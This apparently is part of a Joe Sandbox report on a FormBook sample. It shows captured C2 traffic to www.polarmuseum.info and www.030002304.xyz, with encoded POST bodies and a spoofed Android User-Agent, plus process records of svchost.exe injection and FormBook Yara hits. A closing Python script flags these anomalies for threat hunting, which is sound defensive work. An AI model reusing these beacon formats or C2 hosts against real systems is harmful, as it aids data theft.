                                                                            Nov 5, 2024 15:24:48.166595936 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            28 | 192.168.2.4 | 55747 | 161.97.142.144 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:49.918874025 CET | 538 | OUT | GET /jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.030002304.xyz
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:24:50.688800097 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:50 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Content-Length: 2966
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "66cce1df-b96"
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                            Nov 5, 2024 15:24:50.688812971 CET | 212 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.des
                                                                            Nov 5, 2024 15:24:50.688824892 CET | 1236 | IN | Data Raw: 63 72 69 70 74 69 6f 6e 2d 74 65 78 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e
                                                                            Data Ascii: cription-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyf
                                                                            Nov 5, 2024 15:24:50.688972950 CET | 212 | IN | Data Raw: 2d 34 36 63 30 2d 32 35 2e 33 36 35 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63
                                                                            Data Ascii: -46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn a
                                                                            Nov 5, 2024 15:24:50.690660000 CET | 274 | IN | Data Raw: 6e 69 6d 61 74 65 5f 5f 64 65 6c 61 79 2d 31 73 22 3e 0a 09 09 09 09 09 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f
                                                                            Data Ascii: nimate__delay-1s"><p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            29 | 192.168.2.4 | 55748 | 13.248.169.48 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:55.883507013 CET | 808 | OUT | POST /9u26/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.polarmuseum.info
                                                                            Origin: http://www.polarmuseum.info
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.polarmuseum.info/9u26/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 34 49 62 6d 57 54 6a 42 49 65 61 35 70 53 55 57 72 33 57 7a 39 4a 58 6b 73 4b 4a 6d 39 57 62 74 37 37 41 30 2f 46 32 54 6a 37 4f 39 72 78 78 57 46 59 64 39 64 4e 79 73 71 2f 72 34 69 6a 4e 6c 79 63 50 6a 31 6f 75 34 4d 69 37 55 52 55 30 73 4c 59 2f 45 41 61 35 47 68 6d 66 70 6a 2b 79 4d 45 47 73 49 41 64 58 48 71 73 46 50 34 64 53 55 47 4b 69 2f 59 6a 2b 38 64 7a 4a 50 41 33 6f 31 70 39 47 30 63 73 69 6d 5a 64 73 2b 79 52 56 6b 62 65 37 4f 30 56 38 2f 77 6c 2b 4a 52 66 71 36 52 70 79 74 52 6a 4c 67 52 52 76 68 49 41 2f 7a 2f 2b 67 4a 55 45 30 6f 47 2b 6e 36 37 65 54 6a 62 41 3d 3d
                                                                            Data Ascii: zhl=4IbmWTjBIea5pSUWr3Wz9JXksKJm9Wbt77A0/F2Tj7O9rxxWFYd9dNysq/r4ijNlycPj1ou4Mi7URU0sLY/EAa5Ghmfpj+yMEGsIAdXHqsFP4dSUGKi/Yj+8dzJPA3o1p9G0csimZds+yRVkbe7O0V8/wl+JRfq6RpytRjLgRRvhIA/z/+gJUE0oG+n67eTjbA==


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            30 | 192.168.2.4 | 55749 | 13.248.169.48 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:58.420857906 CET | 828 | OUT | POST /9u26/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.polarmuseum.info
                                                                            Origin: http://www.polarmuseum.info
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.polarmuseum.info/9u26/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 34 49 62 6d 57 54 6a 42 49 65 61 35 72 79 6b 57 6f 51 36 7a 36 70 58 72 6a 71 4a 6d 32 32 62 68 37 37 63 30 2f 41 48 57 69 49 36 39 72 55 64 57 58 63 78 39 65 4e 79 73 74 50 72 39 6d 6a 4d 49 79 63 79 65 31 70 53 34 4d 69 76 55 52 57 38 73 4c 50 44 48 41 4b 35 41 70 47 66 72 38 75 79 4d 45 47 73 49 41 64 54 70 71 6f 70 50 34 74 43 55 47 75 4f 77 47 54 2b 39 61 7a 4a 50 45 33 70 79 70 39 48 68 63 74 75 4d 5a 66 55 2b 79 51 6c 6b 61 4d 44 4a 36 56 38 6d 30 6c 2f 71 52 4f 48 43 58 4c 62 6c 51 43 32 45 54 56 7a 69 45 6d 75 70 75 50 42 65 47 45 51 62 62 35 75 4f 32 64 75 71 41 4c 6f 4f 6d 74 4f 59 4f 56 47 54 78 38 57 52 66 59 69 38 34 4d 4d 3d
                                                                            Data Ascii: zhl=4IbmWTjBIea5rykWoQ6z6pXrjqJm22bh77c0/AHWiI69rUdWXcx9eNystPr9mjMIycye1pS4MivURW8sLPDHAK5ApGfr8uyMEGsIAdTpqopP4tCUGuOwGT+9azJPE3pyp9HhctuMZfU+yQlkaMDJ6V8m0l/qROHCXLblQC2ETVziEmupuPBeGEQbb5uO2duqALoOmtOYOVGTx8WRfYi84MM=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            31 | 192.168.2.4 | 55750 | 13.248.169.48 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:25:00.973829985 CET | 10910 | OUT | POST /9u26/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.polarmuseum.info
                                                                            Origin: http://www.polarmuseum.info
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.polarmuseum.info/9u26/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 34 49 62 6d 57 54 6a 42 49 65 61 35 72 79 6b 57 6f 51 36 7a 36 70 58 72 6a 71 4a 6d 32 32 62 68 37 37 63 30 2f 41 48 57 69 4a 43 39 72 43 4a 57 55 37 6c 39 66 4e 79 73 75 50 72 38 6d 6a 4d 77 79 63 72 5a 31 70 65 6f 4d 67 58 55 52 31 6b 73 61 72 58 48 54 71 35 41 72 47 66 71 6a 2b 79 6a 45 47 38 45 41 64 44 70 71 6f 70 50 34 72 75 55 50 61 69 77 45 54 2b 38 64 7a 4a 54 41 33 6f 56 70 39 65 61 63 74 71 32 5a 76 30 2b 7a 77 31 6b 63 2f 37 4a 79 56 38 6b 34 46 2f 4d 52 4f 4c 64 58 4c 48 44 51 43 54 68 54 53 62 69 56 78 44 45 71 38 6c 6f 54 31 55 38 41 6f 53 5a 2f 66 4b 2f 49 37 67 6f 74 76 6d 38 65 57 4b 6b 33 65 50 2f 4d 37 6d 6e 69 72 63 79 62 35 4a 54 77 32 61 38 58 58 74 39 2b 36 6a 5a 58 4b 73 55 62 31 39 67 33 67 45 55 6b 72 31 38 4b 6b 35 71 2f 2b 78 6d 65 53 33 51 56 34 62 2b 58 52 33 56 56 32 61 56 68 39 47 49 79 34 36 52 44 44 30 52 75 6d 49 66 50 32 59 4c 64 44 6e 43 44 7a 37 57 6a 31 61 76 63 73 58 72 76 30 33 35 41 39 48 2b 38 76 70 4d 4c 55 4e 78 50 37 33 6f 78 5a 68 69 50 6b [TRUNCATED]
                                                                            Data Ascii: zhl=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 [TRUNCATED]


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            32 | 192.168.2.4 | 55751 | 13.248.169.48 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:25:03.513168097 CET | 541 | OUT | GET /9u26/?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nN HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.polarmuseum.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:25:04.165735006 CET | 396 | IN | HTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Tue, 05 Nov 2024 14:25:04 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 256
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 7a 68 6c 3d 31 4b 7a 47 56 6d 76 4f 4b 59 6d 43 6f 31 77 70 75 57 2b 72 38 4e 50 38 6c 2f 56 37 2f 53 44 32 71 66 4d 33 36 6e 4b 4a 6a 49 57 77 35 79 52 7a 4f 70 6c 31 56 35 79 4d 6c 4b 62 2b 6f 42 30 5a 6b 4a 54 72 37 72 32 49 4b 33 58 74 62 57 63 4b 65 36 2f 50 45 61 6c 44 6b 6e 33 71 77 66 43 6d 44 6e 55 6d 50 63 66 44 6e 64 4e 50 7a 4d 36 53 45 59 72 5a 62 52 34 3d 26 58 38 52 78 31 3d 7a 6e 68 68 49 62 42 38 6e 4e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nN"}</script></head></html>



                                                                            Target ID:0
                                                                            Start time:09:22:01
                                                                            Start date:05/11/2024
                                                                            Path:C:\Users\user\Desktop\r6lOHDg9N9.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\r6lOHDg9N9.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'339'905 bytes
                                                                            MD5 hash:9F65C6E2192CC6757C1E7BE556A4BC9A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:09:22:03
                                                                            Start date:05/11/2024
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\r6lOHDg9N9.exe"
                                                                            Imagebase:0xb50000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:09:22:33
                                                                            Start date:05/11/2024
                                                                            Path:C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe"
                                                                            Imagebase:0xb10000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:6
                                                                            Start time:09:22:35
                                                                            Start date:05/11/2024
                                                                            Path:C:\Windows\SysWOW64\write.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\write.exe"
                                                                            Imagebase:0x2a0000
                                                                            File size:10'240 bytes
                                                                            MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:09:22:48
                                                                            Start date:05/11/2024
                                                                            Path:C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe"
                                                                            Imagebase:0xb10000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:8
                                                                            Start time:09:23:00
                                                                            Start date:05/11/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6bf500000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true
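
The process list above carries the artifacts an analyst would pivot on: Target ID 1 is C:\Windows\SysWOW64\svchost.exe, yet its command line is the sample's own path, which is what a hollowed or injected host process looks like in a process listing; Target IDs 5 and 7 run the dropped fZXsbVktlmkz.exe from a long random-looking directory under Program Files (x86); and Target ID 6, write.exe, carries FormBook Yara matches in its memory. The HTTP request earlier in this section adds a network-side anomaly: a Windows process sending an Android/Samsung User-Agent to www.polarmuseum.info. The script below is an added example written for this page, not Joe Sandbox code; it transcribes those records as constructed input and applies the editor's own heuristics (the directory-name length threshold and the mobile User-Agent token list are assumptions) to flag each anomaly, while comparing image names case-insensitively so that firefox.exe launched as Firefox.exe is not reported.

```python
"""Triage heuristics over the process records and HTTP request captured in
this report. Added example for this page, not Joe Sandbox code: the input
below is transcribed from the report text and the thresholds are the
editor's own assumptions."""
import ntpath
import re

# Constructed input: the fields these checks need, copied from the
# process list above (Target IDs 0, 1, 5, 6, 7 and 8).
SAMPLE = r'"C:\Users\user\Desktop\r6lOHDg9N9.exe"'
DROPPED = (r"C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ"
           r"\fZXsbVktlmkz.exe")
FORMBOOK_RULES = ["JoeSecurity_FormBook_1", "Windows_Trojan_Formbook_1112e116"]
PROCESSES = [
    {"id": 0, "path": SAMPLE.strip('"'), "cmdline": SAMPLE, "yara": []},
    {"id": 1, "path": r"C:\Windows\SysWOW64\svchost.exe", "cmdline": SAMPLE,
     "yara": FORMBOOK_RULES},
    {"id": 5, "path": DROPPED, "cmdline": f'"{DROPPED}"', "yara": FORMBOOK_RULES},
    {"id": 6, "path": r"C:\Windows\SysWOW64\write.exe",
     "cmdline": r'"C:\Windows\SysWOW64\write.exe"', "yara": FORMBOOK_RULES},
    {"id": 7, "path": DROPPED, "cmdline": f'"{DROPPED}"', "yara": FORMBOOK_RULES},
    {"id": 8, "path": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "yara": []},
]

# The GET request headers captured above, reproduced as constructed input.
HTTP_REQUEST = """\
Accept-Language: en-US,en;q=0.9
Host: www.polarmuseum.info
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
"""


def image_from_cmdline(cmdline):
    """Executable named by a command line, quoted or bare."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def looks_random(name, min_len=24):
    """Heuristic (assumed threshold): a long, letters-only, mixed-case
    directory name with no spaces, digits or separators."""
    return (len(name) >= min_len and name.isalpha()
            and not name.islower() and not name.isupper())


def triage(processes):
    """Map each Target ID to the list of anomalies its record shows."""
    report = {}
    for p in processes:
        hits = []
        image = ntpath.basename(p["path"]).lower()
        started_as = ntpath.basename(image_from_cmdline(p["cmdline"])).lower()
        # Case-insensitive compare: firefox.exe vs Firefox.exe is benign,
        # svchost.exe started with the sample's command line is not.
        if image != started_as:
            hits.append(f"image/cmdline mismatch: {image} running as {started_as}")
        dirs = ntpath.normpath(p["path"]).split("\\")[1:-1]
        if any(looks_random(d) for d in dirs):
            hits.append("random-looking directory in image path")
        if p["yara"] and p["path"].lower().startswith("c:\\windows\\"):
            hits.append("Windows system binary with Yara matches: "
                        + ", ".join(sorted(set(p["yara"]))))
        report[p["id"]] = hits
    return report


# Assumed token list; extend for the platforms your sandbox never runs.
MOBILE_TOKENS = ("Android", "iPhone", "iPad", "Mobile Safari")


def user_agent_mismatch(request_text, host_os="Windows"):
    """True when the User-Agent claims a mobile platform and never names
    the OS the sandbox actually runs (here Windows)."""
    ua = ""
    for line in request_text.splitlines():
        name, _, value = line.partition(":")
        if name.strip().lower() == "user-agent":
            ua = value.strip()
    if not ua:
        return False
    return any(t in ua for t in MOBILE_TOKENS) and host_os.lower() not in ua.lower()


if __name__ == "__main__":
    for tid, hits in triage(PROCESSES).items():
        for h in hits:
            print(f"target {tid}: {h}")
    print("user-agent/platform mismatch:", user_agent_mismatch(HTTP_REQUEST))
```

Run against the transcribed records, the script reports the svchost.exe mismatch and its Yara hits for Target ID 1, the random directory for Target IDs 5 and 7, the Yara-tagged system binary for Target ID 6, nothing for the original sample or Firefox, and a User-Agent/platform mismatch for the captured request. Path-versus-command-line comparison and "system binary with malware Yara hits" are the two checks worth carrying into a hunting query over endpoint telemetry; the directory-name heuristic is only a sandbox-report convenience and will need tuning against real software installs.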


                                                                              Execution Graph

